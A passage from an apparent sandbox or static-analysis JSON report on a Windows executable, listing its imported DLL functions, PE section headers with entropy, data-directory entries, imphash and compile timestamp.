  2614. "address": "0x4361c8"
  2615. }
  2616. ],
  2617. "dll": "WINHTTP.dll"
  2618. },
  2619. {
  2620. "imports": [
  2621. {
  2622. "name": "FindNextUrlCacheContainerW",
  2623. "address": "0x4361d0"
  2624. },
  2625. {
  2626. "name": "InternetCheckConnectionA",
  2627. "address": "0x4361d4"
  2628. }
  2629. ],
  2630. "dll": "WININET.dll"
  2631. },
  2632. {
  2633. "imports": [
  2634. {
  2635. "name": "waveOutGetErrorTextW",
  2636. "address": "0x4361dc"
  2637. }
  2638. ],
  2639. "dll": "WINMM.dll"
  2640. },
  2641. {
  2642. "imports": [
  2643. {
  2644. "name": null,
  2645. "address": "0x43624c"
  2646. }
  2647. ],
  2648. "dll": "wsnmp32.dll"
  2649. }
  2650. ],
  2651. "digital_signers": null,
  2652. "exported_dll_name": null,
  2653. "actual_checksum": "0x000a0d78",
  2654. "overlay": null,
  2655. "imagebase": "0x00400000",
  2656. "reported_checksum": "0x00000000",
  2657. "icon_hash": null,
  2658. "entrypoint": "0x0042685e",
  2659. "timestamp": "2019-06-23 22:20:50",
  2660. "osversion": "5.1",
  2661. "sections": [
  2662. {
  2663. "name": ".text",
  2664. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
  2665. "virtual_address": "0x00001000",
  2666. "size_of_data": "0x00034800",
  2667. "entropy": "6.32",
  2668. "raw_address": "0x00000400",
  2669. "virtual_size": "0x0003461b",
  2670. "characteristics_raw": "0x60000020"
  2671. },
  2672. {
  2673. "name": ".rdata",
  2674. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2675. "virtual_address": "0x00036000",
  2676. "size_of_data": "0x00008c00",
  2677. "entropy": "5.45",
  2678. "raw_address": "0x00034c00",
  2679. "virtual_size": "0x00008bd6",
  2680. "characteristics_raw": "0x40000040"
  2681. },
  2682. {
  2683. "name": ".data",
  2684. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2685. "virtual_address": "0x0003f000",
  2686. "size_of_data": "0x0004ee00",
  2687. "entropy": "6.08",
  2688. "raw_address": "0x0003d800",
  2689. "virtual_size": "0x0005045c",
  2690. "characteristics_raw": "0xc0000040"
  2691. },
  2692. {
  2693. "name": ".rsrc",
  2694. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2695. "virtual_address": "0x00090000",
  2696. "size_of_data": "0x00000600",
  2697. "entropy": "4.70",
  2698. "raw_address": "0x0008c600",
  2699. "virtual_size": "0x00000488",
  2700. "characteristics_raw": "0x40000040"
  2701. },
  2702. {
  2703. "name": ".reloc",
  2704. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  2705. "virtual_address": "0x00091000",
  2706. "size_of_data": "0x00007a00",
  2707. "entropy": "6.45",
  2708. "raw_address": "0x0008cc00",
  2709. "virtual_size": "0x0000799c",
  2710. "characteristics_raw": "0x42000040"
  2711. }
  2712. ],
  2713. "resources": [],
  2714. "dirents": [
  2715. {
  2716. "virtual_address": "0x00000000",
  2717. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  2718. "size": "0x00000000"
  2719. },
  2720. {
  2721. "virtual_address": "0x0003dc34",
  2722. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  2723. "size": "0x000002bc"
  2724. },
  2725. {
  2726. "virtual_address": "0x00090000",
  2727. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  2728. "size": "0x00000488"
  2729. },
  2730. {
  2731. "virtual_address": "0x00000000",
  2732. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  2733. "size": "0x00000000"
  2734. },
  2735. {
  2736. "virtual_address": "0x00000000",
  2737. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  2738. "size": "0x00000000"
  2739. },
  2740. {
  2741. "virtual_address": "0x00091000",
  2742. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  2743. "size": "0x0000799c"
  2744. },
  2745. {
  2746. "virtual_address": "0x0003d520",
  2747. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  2748. "size": "0x0000001c"
  2749. },
  2750. {
  2751. "virtual_address": "0x00000000",
  2752. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  2753. "size": "0x00000000"
  2754. },
  2755. {
  2756. "virtual_address": "0x00000000",
  2757. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  2758. "size": "0x00000000"
  2759. },
  2760. {
  2761. "virtual_address": "0x00000000",
  2762. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  2763. "size": "0x00000000"
  2764. },
  2765. {
  2766. "virtual_address": "0x0003d540",
  2767. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  2768. "size": "0x00000040"
  2769. },
  2770. {
  2771. "virtual_address": "0x00000000",
  2772. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  2773. "size": "0x00000000"
  2774. },
  2775. {
  2776. "virtual_address": "0x00036000",
  2777. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  2778. "size": "0x00000254"
  2779. },
  2780. {
  2781. "virtual_address": "0x00000000",
  2782. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  2783. "size": "0x00000000"
  2784. },
  2785. {
  2786. "virtual_address": "0x00000000",
  2787. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  2788. "size": "0x00000000"
  2789. },
  2790. {
  2791. "virtual_address": "0x00000000",
  2792. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  2793. "size": "0x00000000"
  2794. }
  2795. ],
  2796. "exports": [],
  2797. "guest_signers": {},
  2798. "imphash": "c8503ab5366fc6e13552bba734a2de16",
  2799. "icon_fuzzy": null,
  2800. "icon": null,
  2801. "pdbpath": null,
  2802. "imported_dll_count": 34,
  2803. "versioninfo": []
  2804. }
  2805. }